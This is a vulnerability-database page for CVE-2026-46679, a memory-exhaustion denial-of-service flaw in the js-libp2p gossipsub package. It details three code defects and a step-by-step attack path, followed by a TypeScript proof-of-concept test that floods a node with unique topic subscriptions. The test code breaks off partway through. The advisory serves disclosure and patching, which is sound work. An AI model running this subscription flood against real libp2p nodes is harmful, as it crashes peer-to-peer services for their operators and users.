CVE-2026-46679

HIGHPre-NVD 7.57.5

7.5

js-libp2p: Memory DoS via subscription flood of unique topics

Summary

Three cooperating omissions in @libp2p/gossipsub allow an unauthenticated single peer to exhaust the Node.js heap of any gossipsub node with default options.

defaultDecodeRpcLimits.maxSubscriptions = Infinity (packages/gossipsub/src/message/decodeRpc.ts:11): no decode-level cap on subscription entries per RPC.
handleReceivedSubscription is unbounded (gossipsub.ts:1009-1021): every unique topic string creates a new Map entry + Set object in this.topics with no per-peer count limit.
removePeer leaves empty Sets (gossipsub.ts:782-784): after peer disconnect, empty Sets are never deleted from this.topics thus memory is non-reclaimable within the process lifetime.

A single 4MB LP frame carries 349,525 unique topic SUBSCRIBE entries. Each frame causes ~89MB of heap growth (~22x amplification). A Node.js process with a 1.5GB heap limit crashes after ~17 such frames (~68MB total attacker bandwidth, achievable in ~5 seconds at 100Mbps).

Details

Defect 1: `defaultDecodeRpcLimits.maxSubscriptions = Infinity` (`message/decodeRpc.ts:11`)

``typescript export const defaultDecodeRpcLimits: DecodeRPCLimits = { maxSubscriptions: Infinity, // <- no decode-level cap // ... }

Passed directly to the protobuf decoder at gossipsub.ts:863. A single RPC may decode 349,525 SUBSCRIBE entries within the 4MB LP frame with no error.
Defect 2: handleReceivedSubscription unbounded growth (gossipsub.ts:1009-1021)

typescript                                        
let topicSet = this.topics.get(topic)
if (topicSet == null) {
  topicSet = new Set()
  this.topics.set(topic, topicSet)   // new entry per unique topic, no count guard
}
topicSet.add(from.toString())
this.topics (Map>, gossipsub.ts:141) has no size limit. No per-peer topic count is tracked. No heartbeat evicts unused entries. A comment at gossipsub.ts:960 acknowledges the map is "not bounded by topic count", but only for the allowedTopics != null branch, the default is null.
Defect 3: removePeer memory leak (gossipsub.ts:782-784)typescript                                        
for (const peers of this.topics.values()) {
  peers.delete(id)
  // empty Set is NOT removed from this.topics
} 
After disconnect, this.topics retains N empty Sets, one per unique attacker topic. stop() (lines 575–602) clears 12 data structures but not this.topics. Memory is leaked for the process lifetime.Secondary: the O(topics.size) synchronous scan in removePeer grows as this.topics accumulates from repeated attacks. After 17 rounds, the scan iterates ~6M entries each time any peer disconnects.
Attack path                                      

Attacker dials victim and opens a gossipsub stream.
Score 0 > gossipThreshold = −10 thus subscriptions are processed immediately. No score check gates subscription handling.

Attacker constructs an RPC: 349,525 SUBSCRIBE entries with sequential 6-char topics. Total encoded size: 4.00 MB.
Victim's handleReceivedRpc calls rpc.subscriptions.forEach(...) → 349,525 calls to handleReceivedSubscription -> this.topics grows by 349,525 entries -> ~89MB heap consumed -> ~224ms event-loop blocked.

Attacker reconnects. No score decay or penalty applies to subscription RPCs. Repeat.
After ~17 rounds (68MB attacker bandwidth): Node.js OOM (Out-Of-Memory) crash.
PoC

Steps to reproduce (confirmed unpatched at HEAD 9eb27be79):bash                                              
$ git clone https://github.com/libp2p/js-libp2p.git
$ cd js-libp2p                                         
$ npm install                                          
$ cd packages/gossipsub                                
$ npx aegir build                                      
$ node --experimental-vm-modules ../../node_modules/.bin/mocha 'dist/test/poc.js' --timeout 60000                                        
File PoC:typescript
/* eslint-env mocha */
import { stop } from '@libp2p/interface'
import assert from 'node:assert'
import { performance } from 'node:perf_hooks'
import { RPC } from '../src/message/rpc.js'
import { createComponents, connectPubsubNodes } from './utils/create-pubsub.js'
import type { GossipSubAndComponents } from './utils/create-pubsub.js'
// Number of unique topics per attack RPC (for direct injection tests).
// Chosen to demonstrate impact without LP-framing; the ENCODE test shows
// how many actually fit in one 4 MB frame.
const UNIQUE_TOPICS_PER_RPC = 349_000
// Build a protobuf-encoded RPC with N unique SUBSCRIBE entries.
// Uses minimal 2-char topic strings ("00".."zz") to maximise packing.
// SubOpts(subscribe=true, topic=2chars): 2 + (2+2) = 6 bytes per entry.
// Outer RPC field: tag+len ≈ 2 bytes -> ~8 bytes total per subscription.
// 4 MB / 8 bytes ≈ 524K subscriptions per frame.
function buildSubscriptionFloodRpc (count: number): Uint8Array {
  const subscriptions = Array.from({ length: count }, (_, i) => ({
    subscribe: true,
    // Sequential 6-char decimal topics: short but still unique
    topic: i.toString().padStart(6, '0')
  }))
  return RPC.encode({ subscriptions, messages: [], control: undefined })
}
// Binary-search the exact number of unique 6-char topics that fit in 4 MB.
function maxTopicsIn4MB (): number {
  const MAX_LP_BYTES = 4 * 1024 * 1024
  let lo = 1; let hi = 600_000
  while (lo < hi) {
    const mid = (lo + hi + 1) >> 1
    if (buildSubscriptionFloodRpc(mid).byteLength <= MAX_LP_BYTES) {
      lo = mid
    } else {
      hi = mid - 1
    }
  }
  return lo
}
describe('PoC: Memory DoS via subscription flood of unique topics', function () {
  this.timeout(60_000)
  let victim: GossipSubAndComponents
  let attacker: GossipSubAndComponents
  beforeEach(async () => {
    ;[victim, attacker] = await Promise.all([
      createComponents({ init: { allowPublishToZeroTopicPeers: true } }),
      createComponents({ init: { allowPublishToZeroTopicPeers: true } })
    ])
    await connectPubsubNodes(victim, attacker)
  })
  afterEach(async () => {
    await stop(
      victim.pubsub, attacker.pubsub,
      ...Object.values(victim.components),
      ...Object.values(attacker.components)
    )
  })
  it('FLOOD: unique topic subscriptions accumulate unboundedly in this.topics', () => {
    const victimPubsub = victim.pubsub as any
    const attackerIdStr = attacker.components.peerId.toString()
    const topicsBefore = victimPubsub.topics.size as number
    const heapBefore = process.memoryUsage().heapUsed

// Simulate one round of subscription flood: inject UNIQUE_TOPICS_PER_RPC // unique topics directly via handleReceivedSubscription (the exact function // called synchronously from handleReceivedRpc for each decoded SubOpts entry). const t0 = performance.now() for (let i = 0; i < UNIQUE_TOPICS_PER_RPC; i++) { victimPubsub.handleReceivedSubscription( { toString: () => attackerIdStr } as any,poc-sub-flood-${i.toString().padStart(6, '0')}, true ) } const elapsed = performance.now() - t0

const topicsAfter = victimPubsub.topics.size as number const heapAfterBytes = process.memoryUsage().heapUsed const heapGrowthMB = (heapAfterBytes - heapBefore) / (1024 * 1024) const newTopics = topicsAfter - topicsBefore

console.log(\n[PoC] Unique topics injected: ${UNIQUE_TOPICS_PER_RPC.toLocaleString()}) console.log([PoC] this.topics.size: ${topicsBefore} -> ${topicsAfter} (grew by ${newTopics.toLocaleString()})) console.log([PoC] Heap growth (

CVSS v3: 7.5
EG Score: 7.5(low)
EPSS: —
KEV: Not listed

Published

May 21, 2026

Last Modified

May 21, 2026

Vendor Advisories for CVE-2026-46679(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

GHSA-4f8r-922h-2vgv
GitHub Security AdvisoriesHigh
js-libp2p: Memory DoS via subscription flood of unique topics

Data Freshness Timeline

(refreshed 14× in last 7d / 19× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

2026-06-10 03:06 UTCEG score recompute
2026-06-09 14:22 UTCEG score recompute
2026-06-09 01:38 UTCEG score recompute
2026-06-08 12:53 UTCEG score recompute
2026-06-08 00:09 UTCEG score recompute
2026-06-07 11:25 UTCEG score recompute
2026-06-06 22:41 UTCEG score recompute
2026-06-06 09:56 UTCEG score recompute
2026-06-05 21:13 UTCEG score recompute
2026-06-05 08:29 UTCEG score recompute
2026-06-04 19:45 UTCEG score recompute
2026-06-04 07:01 UTCEG score recompute
2026-06-03 18:17 UTCEG score recompute
2026-06-03 05:33 UTCEG score recompute
2026-06-02 16:49 UTCEG score recompute
2026-06-02 04:04 UTCEG score recompute
2026-06-01 15:20 UTCEG score recompute
2026-06-01 02:36 UTCEG score recompute
2026-05-24 06:09 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-46679?

CVE-2026-46679 is a high vulnerability published on May 21, 2026. js-libp2p: Memory DoS via subscription flood of unique topics Summary Three cooperating omissions in @libp2p/gossipsub allow an unauthenticated single peer to exhaust the Node.js heap of any gossipsub node with default options. 1. defaultDecodeRpcLimits.maxSubscriptions = Infinity…

When was CVE-2026-46679 disclosed?

CVE-2026-46679 was first published in the National Vulnerability Database on May 21, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.

What is the CVSS score of CVE-2026-46679?

CVE-2026-46679 has a CVSS v4.0 base score of 7.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..

How do I remediate CVE-2026-46679?

Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-46679, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-46679

Explore →

Is Your Infrastructure Affected by CVE-2026-46679?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.

Start Free Scan →Browse All CVEs

CVE-2026-46679

Summary

Details

Defect 1: `defaultDecodeRpcLimits.maxSubscriptions = Infinity` (`message/decodeRpc.ts:11`)

`Defect 2:` handleReceivedSubscription `unbounded growth (`gossipsub.ts:1009-1021`)`

`Defect 3:` removePeer `memory leak (`gossipsub.ts:782-784`)`

`Attack path`

`PoC`

Published

Last Modified

Vendor Advisories for CVE-2026-46679(1)

Data Freshness Timeline

Frequently asked(4)

Dependency Blast Radius

Is Your Infrastructure Affected by CVE-2026-46679?

CVE-2026-46679

Summary

Details

Defect 1: defaultDecodeRpcLimits.maxSubscriptions = Infinity (message/decodeRpc.ts:11)

Defect 2: handleReceivedSubscription unbounded growth (gossipsub.ts:1009-1021)

Defect 3: removePeer memory leak (gossipsub.ts:782-784)

Attack path

PoC

📅 Published

🔄 Last Modified

📣 Vendor Advisories for CVE-2026-46679(1)

Data Freshness Timeline

❓ Frequently asked(4)

Dependency Blast Radius

Is Your Infrastructure Affected by CVE-2026-46679?

Defect 1: `defaultDecodeRpcLimits.maxSubscriptions = Infinity` (`message/decodeRpc.ts:11`)

`Defect 2:` handleReceivedSubscription `unbounded growth (`gossipsub.ts:1009-1021`)`

`Defect 3:` removePeer `memory leak (`gossipsub.ts:782-784`)`

`Attack path`

`PoC`

Published

Last Modified

Vendor Advisories for CVE-2026-46679(1)

Frequently asked(4)